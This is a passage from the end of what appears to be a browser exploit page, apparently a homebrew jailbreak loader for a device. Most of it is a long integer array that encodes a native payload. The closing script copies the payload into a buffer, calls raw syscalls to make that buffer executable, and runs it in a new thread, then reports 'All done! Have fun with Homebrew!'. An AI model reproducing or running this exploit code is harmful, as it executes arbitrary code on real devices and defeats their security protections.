148619588,4168649544,1346800456,1224705352,2345158025,1166624838,3296989124,2197815296,2303197503,309639253,4294745064,1975551487,1435191305,11135416,2303459328,3828434407,4294715624,3229960447,2337014900,2336755808,384354429,838860796,3229960438,2336752756,826609776,3984936447,2303463796,4227590383,2236153855,1275360448,1292925067,2104812677,1962313032,3984936312,3977087816,251658255,961331861,2500839533,1153598656,913633417,1962313029,12402993,1207959616,692438529,3884535029,1290701125,3523211913,1962902861,3293940540,641502539,1157531980,369093161,4008,1435183083,3321972932,4293364044,1209723857,1210631299,2303516297,1547787263,1581342017,4284309313,982821,71550720,0,683967304,1103114587,1096630620,1566523742,8567235,839892992,551731528,265292104,2303247904,3800123634,4294901759,2629968399,2370370143,4294754317,2425178367,4294966848,3819366785,3509125219,3789719689,2370306147,4294682125,2173519103,4288419071,4145932673,3509125219,2312120641,1677023624,227362816,4294966804,831580545,2302935140,1676230016,2312186112,1680854152,227362816,4294966857,1034414465,3509125220,1004767369,2370306148,4294631693,1659470335,687891426,2659748305,1459643360,3324120989,8567235,839892992,1221691720,1210114497,2370357257,1262440592,361318401,3704,2291174728,1208044699,241309065,2370306048,942553232,361318402,3660,1217432904,1208119776,238425481,2370306048,1910773904,361318402,3616,2291174728,1208120387,235541897,2370306048,1950587024,361318402,3572,1083215176,1208120446,232658313,2370306048,1954955408,361318402,3528,2156957000,1208120510,229774729,2370306048,84476048,361318400,3668,1351650632,1207963484,238949769,2370306048,257822864,361318400,3624,2425392456,1207963872,236066185,2370306048,283287696,361318400,3580,4036005192,1207965661,233182601,2370306048,469618832,361318400,3536,3499134280,1207966718,230299017,2370306048,514027664,361318400,3492,9473352,1207972356,227415433,2370306048,997187728,361318400,3448,2156957000,1207976798,224531849,2370306048,516046992,361318400,3404,546344264,1207959830,216405385,2370306048,1663271056,361318400,3280,814779720,1207985091,213521801,2370306048,1674281104,361318400,3236,546344264,1207985175,210638217,2370306048,1680441488,361318400,3192,3767569736,1207984621,205133193,2370306048,1658409104,361318400,3092,3230698824,1207984853,202249609,2370306048,1648230544,361318400,3080,3767569736,1207984864,199366025,2370306048,1641427088,361318400,3068,277908808,1207967702,202249609,2370306048,975835280,361318400,3056,1083215176,1207974444,198841737,2370306048,760475792,361318400,3036,2425392456,1207972047,190715273,2370306048,435015824,361318400,2936,9473352,1207966188,190977417,2370306048,435126416,361318400,2892,3499134280,1207966191,435527685,361318400,2864,554010952,3271557131,3904909648,4294966641,4294755560,4151109887,233373695,1509949446,246505,4286924800,2336770420,775941,1431585024,4253632595,1276676936,205399435,2303197184,3843424239,1207959563,72137613,2303197184,3263777006,2245328705,1208775872,2236095371,836007387,1208216512,1566300297,834886721,1463927744,1430345281,1398101057,955024200,1224116553,673465543,0,4292184393,700181,3481485568,3229960447,19170319,2827681792,256,1220774216,3984967561,369036917,2692,3925815621,262,174986751,4130406400,609520968,3750316072,172889599,3229941760,1976011073,3311618098,2336812937,731957,115851520,608471368,178696,369033216,2920,1237353800,192201865,1170311496,2330577201,1207959552,2202132361,369098703,2576,4292839752,661269,10283264,2336751616,1143481460,472140937,1221560648,270814345,541494088,2378596680,1207959552,1210073481,1218135691,1210597769,1220757131,2335195529,3263811398,149602662,549113889,1711276032,4281876873,706325,1149978624,2336761892,1141908556,472140939,138447688,1086423880,1220576584,673465481,4282452084,3912843713,2303233148,2232811487,1207959561,369090441,2444,1962313037,646532355,1961723213,1149978633,2303264804,2202533957,2302949572,1096637432,1096630620,3277799774,1447122753,1413567809,2202555221,1281710316,2440331,1090519040,1224722819,2215640965,173,1976730952,3375449368,264275277,40068,13060352,0,37097,3431549184,1288931656,270824589,1220905293,2303260041,822617212,1096438,2303459328,4111859703,1275068425,270820489,610569548,1552500768,4130412580,12474,3884534784,165025279,2303459328,1210066036,136608907,673465543,1,611092808,3867757616,610044232,608487224,320,608487168,324,2089372672,369051684,2180,1106085197,158646665,610020168,1569278264,3296937984,3364439128,1547787611,1581342017,1103322945,1096106326,1213420884,127548813,2202533888,3343401196,2630724,1207959552,807683271,0,941900999,114064,1009009863,114832,438584518,608487096,1153827099,3321895972,1909828,505693382,608486912,250135327,1224736765,141934725,3925854339,151,609520968,1955416112,2303207460,3297331655,4294786536,2246914559,1216116160,807693371,2303252083,1227499,3242721280,2370307811,465461,3750316032,612107080,420871976,2231369737,1210283456,673471491,947618662,1276605701,1293972363,2624910981,2370362161,1277174892,438594701,4282911723,1219292101,1946745731,477399842,3901311288,3135867212,6,1223133516,1275380611,636024321,2248146942,1222145216,673479819,1962902856,898320405,2124,203703433,143267327,1149960192,2202536996,1566261444,1564564545,1103322689,1096106326,1213420884,118109581,2202533888,146362604,1207959552,807697549,608487240,32,1153910784,10276,1153826816,3325104932,3222545476,354698438,608487167,1153875990,4086306596,1032669349,1614,4294699240,3229960447,3364030581,22276607,2370306048,1210590292,539260045,1221036360,401130889,2248146940,914689984,1207959553,673477771,611618124,1418414128,3224444964,1961900360,3515435205,1220607816,1715520131,87587203,2336811637,2236096601,1168864475,2370628913,1125655652,1294873739,2370363529,386573,375296,2303197184,3313715695,3724625924,4294777832,264275455,54405,4253239552,1221621024,321145997,1404276040,1291858330,96133257,1207959552,4058574729,2248146940,2860847040,1207959552,100840333,2303524926,227363040,1500,2234,4018751488,4294757352,264275455,33925,3012380672,15373991,1222674765,96406925,96075776,1207959552,2783506313,2248146940,1214412224,312587149,2303525011,227363040,1443,442,4018751488,4294738920,1975551487,3012380736,5848189,1222674765,86707597,28966912,1207959552,1642655625,2248146940,1209955776,3191452557,2303524970,227363040,1283,1466,4018751488,4294721512,2089502975,2236096548,1209365759,107623819,1149829120,369036324,1704,203703435,1355055944,1547787611,1581342017,8567235,839892992,1220943887,2169041289,4278190049,3240235007,4200087964,1221691720,1210114497,88655881,30213264,419561347,3991045074,2201469571,1351090687,4157741366,65176530,1351155589,3264548697,2287620232,1346467920,3324120989,3959370179,114596,2649423872,4237158480,3091333119,4294957296,2370357553,4294959125,898451711,1107,369098545,1488,3091290433,20000,2370357553,4294729237,898451711,1097,637534001,1456,0,0,0,0,1162559814,1162559814,1162559814,1162559814,2368127638,2333877865,4285217566,307159087,2126017525,2273089628,2933584231,2873883040,1691277431,2790244714,3433740699,1067714934,1660287673,1236798084,3298746114,1456682778,359572493,2376078599,546479511,2999145027,4090755069,1328063081,1082158946,511720287,2332899422,1482074198,3933198808,373303826,658369985,2539888662,3428137313,150603146,1448475944,90543153,1817695207,191306765,946287949,993956028,4072434858,3527778027,986328841,2905997980,2997993774,1797225581,543330209,913102476,2656328406,631810352,1041404989,4028306957,3765584518,1748606166,2524975579,1097935640,401111112,520125835,1976723478,4074812823,2893352045,2983581974,3504901045,1629464511,1761085531,3167875303,1438605369,807435420,1143492840,710004226,4259009573,2593604998,3824162590,303010469,2790022186,3900690341,442889051,3113996232,1569769770,4140763348,4233779715,299611806,1648222957,1569258689,758230167,1890391491,1520483845,1151087846,4276431736,1758746168,3869512579,2879181562,274696620,74413455,3166285500,4198636983,3021968462,1805395722,3956459435,693256743,1076217921,1833492564,2222424099,614166349,1797979729,2661384232,3390598589,2040429965,3954761818,3656596945,2804584450,2728033973,2820747223,2710338896,2545889169,3250754238,520915981,355807710,2546765881,159329863,3466380265,1489547921,493938806,3863633778,2485270186,3012580038,4025523103,3277033047,3620286691,2030844592,3567818523,2966561409,8217218,3349038936,1706354733,1786250686,1523134857,3243302468,1050541511,1075266081,1103755641,265813185,3802363444,542776256,1378856719,1916044237,856863663,2954898465,2972557510,2963792729,1531714638,1352274015,2038877208,34668325,2835583119,485669431,1158269971,1951774741,69478410,3014334929,4172694730,1915400509,2263102856,138892651,1772820005,4277583645,1952539695,1702047585,3106412,0,0,0,0,0,2,822083584,0,0,65280,0,0,0,0,0,1073741824,805318656,0,1073741824,0,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,822083584,0,536871808,65280,0,0,0,0,0,1073741824,1073758208,0,1073741824,2,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1399153491,1819043176,1811958101,1701536361,1818586738,1937339231,1919972142,1666383992,1701335909,1866689644,822109554,2425393344,1929440000,1702130553,1970495341,1852141683,1752194916,862286689,1937339136,1601004916,1970496882,1885300077,1702060392,52,0,0,0,0,0,0,38633,2425393152,1701996032,101,0,0,0,0,1495131,7968779,8280595,9728347,1495175,2323579,7968823,9728391,6656,168456997,168430090,1966014474,1952539760,1397763941,1146115380,776295489,5264720,1685091631,795178081,1429492560,1413563472,1431318085,1701719632,1702112884,1459646573,1868786789,1948280173,1397760111,1313163316,775058976,3288625,1801611628,1701737061,1886596716,1811970162,1701536361,1818586738,1650816863,1919972142,1768685688,1919249250,1600939374,779319667,2020765811,1700749056,1919906418,1701016320,1852990795,1867279461,1951622241,1299477089,1819632751,1768685669,1701008226,1667393868,1702129225,1818324594,1919972142,1701642360,1952805741,1835363584,7958627,1769107571,6714478,1937339183,795698548,1835888483,1815047791,1815044713,1666409065,1937331045,1818850389,1919972142,1668481144,1937331045,1818850389,1684956499,1953724755,1867410789,1768319348,1769234787,1767337583,1700030580,29816];for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,65536,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));alert("All done! Have fun with Homebrew!");done();}</script></body></html>